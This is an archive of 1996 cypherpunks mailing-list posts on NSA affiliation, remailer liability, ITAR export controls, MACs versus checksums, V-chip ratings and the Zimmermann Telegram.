From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 26 Jan 1996 15:05:31 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: TOP_tap
Message-ID: <9601251755.AA15764@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


The NSA is a branch of the DOD.

Up until recently (18-30 months ago) NSA employees were only allowed
to identify themselves as employees of DoD.  It was common knowledge,
that unspecific references to Fort Meade meant NSA; and if you saw
a P.O. from Procurement Office, Fort Meade, it meant the NSA was buying
it.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 26 Jan 1996 04:06:13 +0800
To: cypherpunks@toad.com
Subject: QCD_566
Message-ID: <199601251759.MAA10861@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Donald Weingarten, IBM TJW Research Center, writes in
   February SciAm about the center's investigations of quark
   theory by the "GF11" parallel processing computer dedicated
   solely to quantum chromodynamics (QCD) -- a computer which
   uses 566 parallel processors.

   He describes building the hardware and software of this
   unique tool and what two years of continuous computations
   revealed.

   An aside explains a die-rolling shortcut method called
   Monte Carlo to circumvent the enormous amount of
   computation that lattice QCD would otherwise entail.


   QCD_566







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent S. Gunville" <vingun@rgalex.com>
Date: Fri, 26 Jan 1996 04:18:16 +0800
To: Stephen Albert <stephen_albert@alpha.c2.org>
Subject: Re: Netscape and NNTP
In-Reply-To: <199601250438.UAA26778@infinity.c2.org>
Message-ID: <3107C9BF.1B31@rgalex.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Albert wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I've got a question that I feel like I *should* know the answer to, but don't.
> 
> Say I configure Netscape to point through an open http proxy, and then connect t
> an open NNTP server.  I don't know much about how proxies work.  Does the NNTP
> connection go through the proxy or directly from my machine?  As I understand it
> if it does the first, then I don't have to worry about the NNTP server's log
> file, if any.  But if it does the second, I do.
> 
> Am I in the ballpark here?
> 
> ObCrypto: Not-readily-traceable posting with less hassle than a mail-to-news
> gateway seems to have some privacy relevance, even if it's not directly crypto.

The is a log file that stays on the server...
spcifically the newsrc it contains the news groups and the messages that
were read.  As far as posting netscape handles the mail by coping the
letters that you send out into the file called outbox in the nsmail
directory.

need more info ask
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|Vincent S. Gunville     
|Robbins-Gioia		 
|209 Madison St                       Email  vingun@rgalex.com
|Alexandria, Va 22309    
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 26 Jan 1996 09:29:44 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <v02120d05ad2da4bc4982@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:41 1/25/96, Weld Pond wrote:

>But if all traffic is required to be encrypted which is going through the
>remailer or ISP, how can they be liable for what they cannot possibly
>know?  This will be the state of the net in a few years.
>
>Can a courier be held liable for delivering encrypted documents that
>contained illegal information or were used in a crime?  I don't think so.
>Only if he knew there was something illegal going on.  How are remailers
>any different?

But it will be assumed that the remailer operator knew that his site was to
be used for illegal purposes.

>What about a car rental agency that rented a car to a criminal with bogus
>ID that is used to commit a crime.  Was Ryder held liable for the Oklahoma
>bombing? No.

In the view of the authorities, the benefits to society provided by rental
car agencies outweigh their dangers. The opinon on remailers will be just
the opposite. That's why rental car agencies will remain legal, while
remailers will be outlawed.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 26 Jan 1996 09:15:23 +0800
To: cypherpunks@toad.com
Subject: Re: PGP in Eudora and other mail programs
Message-ID: <v02120d06ad2da5af828f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 1/25/96, Timothy C. May wrote:

>(I understand from this list that Eudora for Windows is now doing this much
>more automatically, that someone has a PGP-in-Eudora package. I don't think
>it was from Qualcomm, but I could be wrong. As a Macintosh version user,
>I'm hoping this comes to the Mac version as well.)

There exist two Eudora/PGP packets. The MacPGP Kit and MacPGP Control. I'd
use MacPGP Control. Just do a search for it.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Fri, 26 Jan 1996 07:03:18 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Secrecy of NSA Affiliation
In-Reply-To: <ad2d127a0c021004fb6e@[205.199.118.202]>
Message-ID: <3107db204068002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May said:
> 
> At 5:55 PM 1/25/96, Rich Salz wrote:
> 
> >Up until recently (18-30 months ago) NSA employees were only allowed
> >to identify themselves as employees of DoD.  It was common knowledge,
> >that unspecific references to Fort Meade meant NSA; and if you saw
> >a P.O. from Procurement Office, Fort Meade, it meant the NSA was buying
> >it.
> 
> When I attended Crypto '88, nearly 8 years ago, at least several of the NSA
> attendees had "National Security Agency" on their name badges. It may be
> that run-of-the-mill employees still maintain the fiction  for public
> consumption that they are DOD employees, but such was not the case in 1988
> at "Crypto."

At the RSA conference last week, there were approximately 10 people from
the NSA. Only 2 of those were registered as DOD, the rest were NSA. I
mentioned this at lunch to a guy from the NSA, and he said that only
oldtimers do the DOD identification anymore.


-- 
Kevin L. Prigge         |"Have you ever gotten tired of hearing those 
UofM Central Computing  | ridiculous AT&T commercials claiming credit 
email: klp@tc.umn.edu   | for things that don't even exist yet? 
010010011101011001100010| You will." -Emmanuel Goldstein 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip R. Moyer" <prm-ml@rome.isl.sri.com>
Date: Fri, 26 Jan 1996 08:18:07 +0800
To: perry@piermont.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601251947.OAA16586@jekyll.piermont.com>
Message-ID: <9601252133.AA08399@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Perry writes:

> Why is he our patron saint? He was a government official coming out
> against invasion of privacy. Isn't that what we are all after, in the
> end? The reason we deploy cryptography is to assure privacy for
> all. We often refer to those who listen in on conversations
> (regardless of who they are) as, in some sense, our
> opposition. Therefore, is not Stimson's remark in closing down
> Yardley's "Black Chamber" to be praised rather than attacked?

At the risk of sounding like an NSA apologist, I have to take issue with
Perry's position on this matter.  I see a distinct difference between
broad monitoring of a nation's citizens and focused signals intelligence
gathering in support of national security.  The Black Chamber was not
out to subvert the national communications infrastructure, or prevent
citizens from obtaining or developing cryptographic tools.  The Black
Chamber was there to cryptanalyze traffic from _governments_.

In other words, I see a distinction between Intelligence activities and
Law Enforcement activities.  Yes, I recognize that there is a gray area
where the two overlap; I believe, however, that signals intelligence is
still a necessary evil in the global environment.  Just saying, "Oh heck,
we don't some of the things the NSA does," and dismantling it is a bit
unrealistic, isn't it?

Cheers,
Phil

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQf3cX6yjLZHwr45AQGokQQApYsv5k1xY7AiMga30+NEPfdogSkIyoQj
8F1b9ZWCqUP7WIdjXUUVttQkpzlm2+v3NMMKp3sbsyLgf/sA+5sqO/S4C1HrKYdv
UbqvnwpxDQpwZxPvsoV7exTqvWrvSj4sNl3Ea09OxcJUVVzwnEgZBKupLW63Ju60
nQ3A8x9qK5I=
=Nbyu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Fri, 26 Jan 1996 04:56:52 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <Pine.BSD/.3.91.960125130741.19788A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


At 23:12 1/24/96, Michael Froomkin wrote:

>If you are a government strategist, you might think, Why not make people
>strictly liable for, e.g., any crimes planned with their remailers?  And
>make ISPs strictly liable for crimes panned or executed on their systems?

But if all traffic is required to be encrypted which is going through the 
remailer or ISP, how can they be liable for what they cannot possibly 
know?  This will be the state of the net in a few years.

Can a courier be held liable for delivering encrypted documents that
contained illegal information or were used in a crime?  I don't think so. 
Only if he knew there was something illegal going on.  How are remailers
any different?

What about a car rental agency that rented a car to a criminal with bogus
ID that is used to commit a crime.  Was Ryder held liable for the Oklahoma
bombing? No. 

In these two situations, people are in business and profitting by
providing a service that can be used to commit crimes. Shouldn't they be
shut down too if remailers are.  I don't know where the idea got started 
that the govenment has it within its power to make illegal any new 
technology that *can* and *is* used to commit crimes.  It is a pretty 
scary one though.  


      Weld Pond   -  weld@l0pht.com     -      http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 26 Jan 1996 08:41:15 +0800
To: cypherpunks@toad.com
Subject: RANT: cypherpunks do NSA's job for them!!
In-Reply-To: <ad2bf34e04021004d2fa@[205.199.118.202]>
Message-ID: <199601252144.NAA27728@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM wrote a long post about how the ITAR tends to prevent just
about any kind of crypto software and hardware development, and
that even importing crypto into the U.S. is likely to be outlawed
if not already illegal.

but I think this whole line of complex thinking and pontificating
is really yucky, and it embarrasses and exasperates me to see 
it here of all places, and from TCM of all people. 

it really bugs me how much cypherpunks try to point out the "gotchas" in all
the laws with crypto. when we become *experts* on these laws, and
tell people why they prevent them from doing various things, we
are actually *supporting* them.

that is the ultimate test of legitimacy: what do you do when you
hear someone wants to do something that would seem to "break a law"?

when you tell them that "what you are doing breaks the law", you are
implicitly revealing that *you*support*that*law*.

the way to *not*support*a*law* is *not* to play these games. not to
second guess what the NSA is doing, how they would react to some
situation, etc.  not to point out what you think they would do if
someone violated their list of "naughty no-nos"

the NSA benefits from the *perceived* straightjacket. the NSA succeeds
by creating a *perception* of restriction, regardless of enforcement.
you *perpetuate* this perception by keeping a handy list of all the
ways that crypto software and hardware development is *impossible* and
repeatedly rebroadcasting it to your friends and public forums like this.

the NSA *loses* through public confrontation, which focuses the
spotlight on the atrociousness of their agenda.

isn't this list the first place that people should say and emphasize,
THE LAWS ARE NOT EXACT. THERE IS ROOM FOR MANEUVERING. PEOPLE SHOULD
CHALLENGE THEM IN COURT.

we are *not* breaking the law or encouraging breaking the law in saying
this. we are *challenging* the law. we are
saying, "no matter what law is passed, the ultimate test of legitimacy
of any law is whether it is supported by our judicial system. many
NSA 'laws' have *never* been tested, and therefore they are *all* suspect!!
we *encourage* people to challenge them, and do a noble service for our country
in clarifying what the laws *really* are!!"

do you think these ITAR laws are legitimate, or not? if they are *not*,
then why do you *treat*them*as*such????

the ridiculous debate about whether the 4 line perl code was illegal 
or legal was PLAYING INTO THE HANDS OF THE NSA.   the NSA *wants* people
to think twice every time they write a modulo function, and all the
endless legal pontificating on this list is a gift from heaven to them.

what *really* exasperates me is TCM saying that "even importing code
is likely to be illegal, because if it is legal now it is likely to
be outlawed". well, WHO SAYS?? this is a *beautiful* example of a place
where some REAL CYPHERPUNKS WITH SOME BALLS could challenge the 
government, and possibly get the support of some strong allies (EFF,
business interested in crypto such as Netscape, Microsoft, Lotus, etc)
if they were challenged in court.  

this is a *perfect* opportunity
for someone to import the crypto, and get it into the market-- don't
you see that the government would then be put at a *disadvantage*
*even*if* they decided they were against it and tried to introduce bills-- 
it would get the publicity
of newspapers and the focus of people watching congress do something
that has been done in the shadows by the NSA for so long (and one of
the main reasons they have gotten away with it).  imagine the brilliant
"photo opportunity" of customs agents trying to stop someone at
an airport because of them taking in computer disks!!!

there is a line of thinking here that goes, "keep your head down, and
don't challenge anything that even *might* be illegal". but I tell you
that is NOT how odious laws are removed. that is exactly how they
are PERPETUATED. we *win* through major public confrontation over
crypto issues. are we *ashamed* because we want strong crypto? is
it something to *hide*??

what TCM's whole essay epitomizes is the *exact*chilling*effect* that the NSA
is aiming for. all this debate about what the current laws actually allow
*begs*the*point* and does not support our agenda for the spread of
crypto, and in fact is detrimental to it.
instead, we need to broadcast to the world the message
"its a gray area, and we cypherpunks are *dying* for 
someone to challenge this in court, we would actually lend them our 
support and rally around them as we did with PRZ".

ok, now someone is going to say, OK wiseguy, why don't YOU do it. that
is not my point. my point is that we merely need to get the message that
even though many cpunks are spineless sheep who don't have the balls 
to challenge the laws themselves, or even suggest this in public,
instead endlessly yammering about what 
is 100% kosher and what isn't (you don't have to say that part (g), ...

"we would support someone who challenges these laws!!!"

the idea that MS signing a cryptographic package from outside this country
constitutes EXPORT OF AN ALGORITHM is OUTRAGEOUS. of course you agree with
me, but the way to demonstrate you agree is to not put up with it. DEFY
any bogus law that you think is bogus!! the test of the legitimacy of
a law is our *court*system*, not what government bureacrats tell you to
do!! and every day that someone listens to a government bureacrat, and
not *what*a*court*thinks*, a little bit of our precious freedom is eroded.

what scares and infuriates me is that by the NSA's standards,
the cypherpunks turn out to me some of the most "law abiding" 
citizens regarding crypto than anyone else in the entire country...!!!

maybe TCM, who in this case imho is part of the PROBLEM and not part of
the SOLUTION, and an example of how our own behavior is sabotaging our
key goals, will think twice when he writes another *sskissing,
tedious "what the NSA thinks about [x]" post.

this ends my semi-periodic rant-of-the-moment. we return you to your
regular listless dialogue.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Chiniewicz <chiniet@pr.erau.edu>
Date: Fri, 26 Jan 1996 06:56:31 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: TOP_tap
In-Reply-To: <9601251755.AA15764@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.960125134924.9630A-100000@moon>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Rich Salz wrote:

> The NSA is a branch of the DOD.
> 
> Up until recently (18-30 months ago) NSA employees were only allowed
> to identify themselves as employees of DoD.  It was common knowledge,
> that unspecific references to Fort Meade meant NSA; and if you saw
> a P.O. from Procurement Office, Fort Meade, it meant the NSA was buying
> it.
> 	/r$
> 
> 
isn't the NSA a branch of the CIA?  And I thought the CIA and DOD were
seperate organizations or was that an incorrect assumption?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 26 Jan 1996 06:07:57 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Bernie S. Sentencing
In-Reply-To: <199601251550.KAA08091@homeport.org>
Message-ID: <Pine.SUN.3.91.960125135103.16565A-100000@dfw.dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Adam Shostack wrote:

> 	He also gave away one of the two clippers that he brought,
> which was destroyed with a small explosive device, showing the truth
> of the old saw about there being few problems not solvable with a
> suitable application of high explosives. :)

Just like to point out that it was me that blew the thing up. I'am still
looking for anyone that took photos of it.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 26 Jan 1996 09:18:03 +0800
To: Rich Salz <ses@tipper.oit.unc.edu
Subject: Re: TOP_tap
Message-ID: <199601252156.NAA28359@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:55 PM 1/25/96 -0500, Rich Salz wrote:
>Up until recently (18-30 months ago) NSA employees were only allowed
>to identify themselves as employees of DoD.  It was common knowledge,
>that unspecific references to Fort Meade meant NSA; and if you saw
>a P.O. from Procurement Office, Fort Meade, it meant the NSA was buying
>it.

Back in the dark ages (I think early 1980s), I attended a Symposium on
Operating System Princples at Asilomar, California.  My luck-of-the-draw
room mate was wearing a badge which proclaimed that he was from NSA, Fort
Mead, MD.  A story of California hippy meets US-DOD.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 26 Jan 1996 09:06:48 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <199601252156.NAA28375@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


... Discussion of rating systems elided.

Does anyone have suggestions for achieving the goals of the V-Chip with
many non-govermental rating agencies?  It seems to me that empowering
parents would head off the TV/Internet censors.  Any parent who was
interested in acting as a censor for their children's TV/Internet would be
happy to pay an extra $20 or so for the technical means to achieve that
goal.  The big problem is how are the labels attached to the programs.  I
agree with Tim that it is probably imposible for individual Usenet
postings.  However is should be possible for TV programs, and whole
newsgroups.

BTW - I think that such hardware/software is a wonderful way train hackers.
 Most of the teenagers I know, know more about their home electronics than
their parents do.  And the teenagers RTFM.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 26 Jan 1996 09:05:49 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: mouse droppings
In-Reply-To: <199601251757.LAA01686@proust.suba.com>
Message-ID: <Pine.SOL.3.91.960125134637.1505A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Alex Strasheim wrote:

> 
> Is Mr. Irving one of the people responsible for the recent positive 
> statements coming out of Commerce?

In general the whole Commerce team is pretty good on this; their goal in 
life is to help US companies sell stuff; it's State and defense that are 
interested in controlling exports. Ron Brown has a top-notch team, and 
he's one of the best politicans (in the good sense) in the country today, 
and is willing to really fight for the interests of Commence. Of course, 
the downside shows in the ethics questions (sigh)

 Of course, State tends to treat arms sales the way other departments
treat logoes boxes of chocolates, to be given away as parting gifts make
guests feel welcome. F-15Es to the Saudi's? Kind of like giving F-4s to 
the Shah.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Fri, 26 Jan 1996 09:33:57 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <199601252200.OAA28468@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Rated N for Noise (perhaps much to the consternation of Tim).

At 11:18 AM 1/25/96 -0800, Timothy C. May wrote:
>(Note that the MPAA movie rating system is _not_ run by the government, nor
>is it even "suggested" by government...though I don't deny that the movie
>theater owners adopted the MPAA ratings to forestall  talked-of government
>actions. But of course movies pass through the chokepoint of distribution,
>and time usually exists to rate them. Usenet posts would of course not fit
>this model.)

I don't know the particulars of how the movie rating system came into being,
but I know about the last few years' government flack about "unsuitable"
material on TV. A couple years back, Senator Paul Simon (D-Illinois) warned
that Congress would use the law to compel the entertainment industry if it
did not voluntarily adjust television content. He said, "If there is not
some sort of positive response by the industry, we are headed for some sort
of legislative response." Amusingly enough, he also admitted that he would
prefer industry restrictions on artistic freedoms because legally mandated
limits to free speech would probably be ruled unconstitutional. 

Claiming that such "voluntary compliance" crap is not censorship is
ridiculous. Not that you were implying that, Tim--I just want people to
understand that this is the same thing as a mugger claiming that, since he
didn't actually shoot his victim, the wallet he received was a gift rather
than stolen goods.

Corey Bridges
Security Documentation
Netscape Communications Corporation
home.netscape.com/people/corey
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 26 Jan 1996 04:56:03 +0800
To: cypherpunks@toad.com
Subject: Re: PZ a Nazi?
In-Reply-To: <199601230400.UAA29972@infinity.c2.org>
Message-ID: <9601251903.AA12292@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>"Private communications between neo-Nazis on the network are
>effected under a program called "Pretty Good Privacy", devised by
>an American neo-Nazi sympathiser."

Not to my knowledge. If the Sunday Times have screwed up here (as appears the 
case). PZ has hit the UK libel jackpot. The UK libel laws prevent a defendant 
from making practically any defense so even if PZ spent his afternoons walking 
arroung in an SS uniform it probably could not be admitted as evidence by the 
ST.

So get your lawyers to put in a demand for damages PZ, should net you approx $5K 
plus appology. The Telegraph are unlikely to want to try to defend the case.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 26 Jan 1996 05:45:36 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <ad2b4efa0102100435ee@[205.199.118.202]>
Message-ID: <4e8k70$bje@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <310612A1.69E7@netscape.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>  Another problem is that the government may consider any "help" provided
>to the foreign entity to be evidence of a conspiracy.  When Eric Young
>released SSLEAY we got a call from someone in the State Department
>(probably some lackey paid for by the NSA) to find out if we provided
>him with any "help" in doing his implementation.  Since he did it all
>on his own from the published spec and was able to test interoperability
>over the internet we were off the hook, but they seemed to be prepared
>to come down on us if we had "conspired" with him.
>
You don't have to go as far as calling it a conspiracy.  Remember
statement (5) that I posted yesterday:

(5) Performing a defense service on behalf of, or for the benefit of, a
foreign person, whether in the United States or abroad.

If Netscape had "helped" Eric write SSLEAY, that would count as a defense
service for the benefit of a foreign person.

Section 120.9:

@ 120.9 -- Defense service.

   Defense service means:

   (1) The furnishing of assistance (including training) to foreign persons,
whether in the United States or abroad in the design, development, engineering,
manufacture, production, assembly, testing, repair, maintenance, modification,
operation, demilitarization, destruction, processing or use of defense articles;
or

   (2) The furnishing to foreign persons of any technical data controlled under
this subchapter (see @ 120.10), whether in the United States or abroad.

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 26 Jan 1996 09:21:58 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: TOP_tap
In-Reply-To: <199601252156.NAA28359@netcom6.netcom.com>
Message-ID: <Pine.SOL.3.91.960125140223.1505B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Bill Frantz wrote:
> 
> Back in the dark ages (I think early 1980s), I attended a Symposium on
> Operating System Princples at Asilomar, California.  My luck-of-the-draw
> room mate was wearing a badge which proclaimed that he was from NSA, Fort
> Mead, MD.  A story of California hippy meets US-DOD.
> 

I kinda feel sorry for the NSA staffers sometimes - they're basically a 
bunch of computer geeks and math whizs who don't get to wear jeans and 
T-shirts




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David A Wagner <daw@CS.Berkeley.EDU>
Date: Fri, 26 Jan 1996 09:34:21 +0800
To: jamesd@echeque.com (James A. Donald)
Subject: Re: Why is blowfish so slow?  Other fast algorithms?
In-Reply-To: <199601250629.WAA16623@mailx.best.com>
Message-ID: <199601252213.OAA02708@lagos.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 07:32 PM 1/23/96 -0500, David A Wagner wrote:
> >If you want authentication, you must use a crypto-strength MAC.
> >Encryption (be it RC4, DES, etc.) is not enough.
> 
> Not so:  If the message is encrypted and checksummed with a simple
> not non cryptographic checksum, this gives you everything a MAC 
> gives you, plus the message is secret.
> 

Not true.

For instance, suppose you append a standard simple CRC-32 of the
plaintext, and then encrypt with CBC mode.  Because CRC-32 is linear,
it's trivial to construct a collision by flipping some of the first
33 bits of the plaintext; but this, in turn, is easy to do by just
flipping the corresponding bits in the IV.  (The attack is even
easier if you're using a stream cipher.)

I'm sure you can come up with a non-cryptographic checksum which looks
(at first glance) like it'll work ok.  Maybe you'll be completely safe.
Still, the security of any such scheme will inherently depend on very
subtle issues of whether the encryption and the checksum can interact--
and there are probably only a handful of people in the free world who
are really qualified to do a full analysis of these effects, I'd guess.

You can use a non-crypto checksum to attempt to provide integrity if
you want, I suppose.  Is that prudent system engineering?  Personally,
I don't think so.


At the risk of sounding like a broken record, I suggest
  Design principle: if you want message integrity/authentication
  guarantees, use a crypto-strength MAC, damnit!

> MACs are only useful in the strange and unsual case where you want
> authentification using a symmetric key, but you want to transmit in
> the clear.

False.  MACs are useful & necessary in a encrypted packet network,
to prevent message tampering by active attackers.  (Unless you prefer
to sign *every* packet with RSA, which is insanely slowwww...)

MACs are useful in conjunction with encryption, I should add.  They're
not mutually exclusive. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 26 Jan 1996 09:44:17 +0800
To: cypherpunks@toad.com
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601251947.OAA16586@jekyll.piermont.com>
Message-ID: <Pine.ULT.3.91.960125140104.9352S-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Perry E. Metzger wrote:

> Phill refers to the man who said "Gentlemen do not read each other's
> mail", (Henry L. Stimson) as a twit.
> 
> I highly disagree. In some ways I regard him as our patron saint
> (although the man was actually far from saintly and later as a member
> of the Roosevelt cabinet adopted an opposite policy of aggressive
> signals intelligence.)
> 
> Why is he our patron saint? He was a government official coming out
> against invasion of privacy. Isn't that what we are all after, in the
> end? The reason we deploy cryptography is to assure privacy for
> all. We often refer to those who listen in on conversations
> (regardless of who they are) as, in some sense, our
> opposition. Therefore, is not Stimson's remark in closing down
> Yardley's "Black Chamber" to be praised rather than attacked?

Sorta, but not really.

Relying on gentlemanliness to protect privacy is a fallacy.

Assuming that gentlemen run the government (or any other entity with power
over you) can be quite dangerous. 

Being a gentleman (or a lady, in the classical sense), though, is a Good
Thing. The fact that the well-informed people on this list tend to be good
ladies and gentlemen is a Very Good Thing.

I believe that the choice not to read other people's personal mail is an
ethical imperative, since we do not have and probably can not have total
privacy enforced by technology and law alone. Sure, strong crypto helps,
and should be spread, but there will always be back doors and
implementation bugs, and in the worst case, most people will give in to
moderate torture. 

It's hard to say what the ethical role of individuals in the government
(or Jim Bell's "assassination politics" organization, which quacks like a
government for me) is. The realist (Morgenthau, Fromkin, Krasner) school
of IR, not to mention Machiavelli, holds that it is an ethical imperative 
to lie, cheat, and steal to further the national interest.

A diplomat was defined, by whom I don't recall, as "a gentleman sent
abroad to lie for his country." 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: williams@va.arca.com (Jeff Williams)
Date: Fri, 26 Jan 1996 01:58:14 +0800
To: cypherpunks@toad.com
Subject: Re: V-chip?
Message-ID: <65534.297195739@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:

> Anyone telling me I have to rate my work, or submit it to a ratings agency,
> is aggressing against me. Now, if others rate my work (which is already
> happening with digest services such as "CP-Lite"), this is their business,
> not mine. But the V-Chip precedent is a precedent for the government to
> insist that all sorts of content be rated. This should be fought in a free
> society.

But what if they *ask* you nicely to label your work?

  "If you think your message is offensive, violent, or racist,
   would you please consider labelling it?"

I don't think I'd mind.  In fact, *optional* labels would make me more likely
to post such material, because I'd have some confidence that it would only be
read by people who want to read it. (And they could even find it more
quickly!)

There's nothing inherently wrong with labelling information. When messages
here are labelled [NOISE], I know to avoid them. This sort of
meta-information is helpful and good.

The precedent is what's troubling. Someone will probably try to mandate the
labels...Someone will try to write a law that says "Anyone who posts what I
consider offensive without a label is guilty." This is what should be
fought...not labels.

--Jeff





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 26 Jan 1996 05:30:27 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: SS Obergruppenfuhrer Zimmermann (NOT!)
In-Reply-To: <m0tevYq-0008y2C@pacifier.com>
Message-ID: <9601251918.AA11120@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Maybe this is common knowledge, but the name "Zimmermann" and crypto had 
>another relationship, in World War I.  If anybody knows more about this 
>incident than my vague recollection of the famous "Zimmermann cipher" would 
>you care to tell the story?

I think you mean Zimmerman Telegram. This was sent by the Germans to the 
Mexicans through the US Embassy in London and offered Mexico the retur of Texas 
in return for entering the war on the German side.

The Brits were tapping the US cables as a matter of course and intercepted and 
decrypted the telegram. They could not show it to the US types saying it came 
from tapping their embassy so they broke into the German embassy in Mexico and 
pilfered another copy of the cipher in another code.

When the Americans were shown how easy it was to decrypt the German telegram 
they said "gosh how clever these guys are - no wonder they have an empire". MI5 
then managed to get their contact person at the British Embassy in Washington to 
effectively suplant the official British Ambassador, setting up a US 
Intelligence service for the Americans, in the process practically becomming a 
mamber of the US cabinet. [As a footnote Ian Flemming enjoied a similar position 
but with considerably less influence during WWII].

Now you see why uncle Sam is so nervous about Simon and Myself...

There is a good book about all this "For the President's Eyes Only". 

	Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 26 Jan 1996 05:03:16 +0800
To: cjl <cypherpunks@toad.com>
Subject: Re: Zimmermann Telegram (crypto history)
In-Reply-To: <Pine.SOL.3.91.960124101611.13539A-100000@welchlink.welch.jhu.edu>
Message-ID: <9601251923.AA06625@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



